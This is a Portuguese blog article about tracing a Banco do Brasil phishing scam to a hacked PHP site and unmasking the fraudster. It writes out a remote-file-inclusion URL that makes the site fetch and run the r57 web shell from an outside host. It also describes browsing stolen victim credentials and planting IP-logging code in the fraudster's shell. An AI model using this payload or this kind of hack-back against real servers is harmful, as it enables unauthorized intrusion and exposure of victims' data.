Hackeando o Hacker – Investigando e contra-atacando um phishing

Primeiramente uma explicação sobre o título do artigo. O verbo “hackear” não existe oficialmente e o termo “hacker” aqui empregado não é o mais correto de ser utilizado, para mim hacker é quem possui conhecimentos avançados em computação e telecomunicações e utiliza esses conhecimentos em seu trabalho honesto para resolver problemas. Já no caso do artigo o termo mais correto seria “cracker” ou ainda fraudador, criminoso, bandido, estelionatário, etc. Enfim, utilizei esses termos por serem mais populares e causarem mais impacto.

Dito isso, vamos ao artigo em si.

Recebi um email cujo remetente se denominava “Banco do Brasil.” e o assunto “Informativo ao

Clientes Banco do Brasil!”. No corpo do e-mail havia um link chamado “[Recadastrando Cliente – BB]” que apontava para o endereço:

http://xxxxxx.ru/tpl/bancodobrasil.php#www.bancodobrasil.com.br/recadsatramento/cliente

Esse por sua vez redirecionou para outro site:

http://www.SITEORIGINAL.com.tw/admin/central/Auto-Atendimento/BancodoBrasil/

Estava aí mais um caso do nosso já conhecido phishing scam.

O site que abriu era uma cópia do site original do Banco do Brasil. Uma das diferenças do original é que o falso solicitava várias senhas diferentes, conforme pode ser visto na figura abaixo

Para obter mais informações sobre a fraude e uma possível identificação do autor, fiz uma pesquisa no site para tentar descobrir como o fraudador conseguiu obter o acesso não autorizado aos arquivos do mesmo.

Constatei que o site foi construído utilizando a linguagem de programação PHP. Uma técnica de invasão muito comum nesse tipo de site é a chamada “PHP Injection” (também conhecida como RFI - Remote File Include). Trata-se de uma técnica que permite executar arquivos remotamente no site inserindo na URL do mesmo uma outra URL contendo um script que permite executar comandos dentro das pastas do próprio site.

Para descobrir se o fraudador utilizou essa técnica, digitei a seguinte URL para ser executada no navegador:

http://www.SITEORIGINAL.com.tw/index.php?pg=http://LOCALDOSCRIPT/r57.txt?&cmd=ls

Através dessa URL é solicitado ao site original executar um arquivo que está em outro site. O arquivo “r57.txt” é um script que possui uma série de comandos para manipular pastas e arquivos do servidor onde está hospedado o site original, no exemplo em questão foi solicitado executar o comando “ls” (r57.txt?&cmd=ls) que lista todos os arquivos e pastas. Esse procedimento só funciona se o site alvo possuir uma falha de segurança específica da linguagem de programação PHP.

Após a execução dessa URL obtive êxito e consegui listar todos os arquivos e pastas do site original, ver imagem abaixo.

Na listagem foi possível descobrir a provável data que o site foi invadido. A data de modificação da pasta “admin” que foi onde o fraudador copiou o falso site era de 22 de julho, às 14:19 conforme a linha abaixo:

57491894 drwxr-xr-x 4 citycrea citycrea 4096 Jul 22 14:19 admin

Através do script “r57.txt” acessei as pastas “admin”, “central” e finalmente a “BancodoBrasil”.

Realizei uma cópia de todos os arquivos do site falso para análise.

Lendo os códigos-fontes dos arquivos copiados descobri que o arquivo “adesao.php” era o responsável por coletar todos os dados digitados pelas vítimas e salvá-los em um arquivo do tipo TXT chamado “PPx.txt”. Ao abrir o arquivo “PPx.txt” constatei que realmente já havia vários dados de agências, contas e senhas capturadas de possíveis vítimas.

Ainda analisando os demais arquivos, encontrei o arquivo “bt0165.php” que tinha como título “By Scra3zy > AoD > CMD > File List”. Tratava-se de um script shell para manipular arquivos e pastas no servidor invadido, parecido com o “r57.txt” que eu estava utilizando. O fraudador o utilizava para manipular os arquivos do seu falso site.

Sabendo disso e visando obter mais meios que pudessem identificar o autor da fraude, pensei em uma maneira de descobrir o endereço IP da conexão de Internet de onde o fraudador gerenciava todo esse sistema.

Como já mencionado, ele utilizava o arquivo “bt0165.php” para manipular os arquivos do falso site e tendo conhecimento que esse sistema utilizava a linguagem PHP, resolvi adicionar ao código-fonte do “bt0165.php” algumas linhas de código que realizariam a função de: toda vez que o sistema fosse acessado, registrar o dia e hora atual do servidor (com fuso horário GMT) e o endereço IP de onde partiu a conexão e salvar em um arquivo do tipo TXT no próprio site, só que em outra pasta e nome que não revelasse a verdadeira intenção do arquivo, para que assim o fraudador não pudesse encontrar facilmente.

Isso foi possível utilizando o script “r57.txt” para editar e inserir o seguinte código ao arquivo “bt0165.php” utilizado pelo fraudador:

$nowt = date('r');

$errors_file = "../error.txt";

$errors_handler = fopen($errors_file, 'a');

$errors_data = $nowt." - ".$_SERVER['REMOTE_ADDR']."\n";

fwrite($errors_handler, $errors_data);

fclose($errors_handler);

Com isso, se o fraudador acessasse o “bt0165.php” para manipular os arquivos do site, automaticamente iria ficar registrada a data e hora (com fuso horário GMT) do acesso e o endereço IP de onde partiu a conexão. E ficaria salvo no arquivo “.../admin/central/Auto-Atendimento/error.txt”.

Após algumas horas já foi possível perceber que o sistema deu certo, ao acessar o arquivo “error.txt” através do navegador, havia várias linhas com as conexões do fraudador conforme imagem abaixo.

Após três dias de monitoramento, identifiquei o comportamento do fraudador, que era de acessar várias vezes ao dia o arquivo “PPx.txt” para verificar se havia sido capturada alguma informação de conta bancária e caso positivo ele copiava o arquivo possivelmente para seu computador e depois utilizava o script “bt0165.php” para apagar o “PPx.txt”. Cada acesso ao “bt0165.php” ficou registrado no arquivo “error.txt”.

De posse do IP do “hacker” realizei uma varredura no seu micro, encontrei uma falha de segurança, invadi, obtive acesso root e formatei o HD dele. :) É brincadeira, não fiz isso, ele que é o bandido não eu.

O IP dele era dinâmico, porém de um provedor nacional, o que mostra que dá para chegar até ele através da quebra de sigilo telemático solicitando na justiça os logs de acesso.

Todas as informações encontradas nessa investigação repassei para as autoridades policiais responsáveis pelo combate ao crime cibernético. Lembrando que o método utilizado nesse artigo só é válido mediante prévio mandado judicial autorizando os procedimentos.

É isso aí, até a próxima!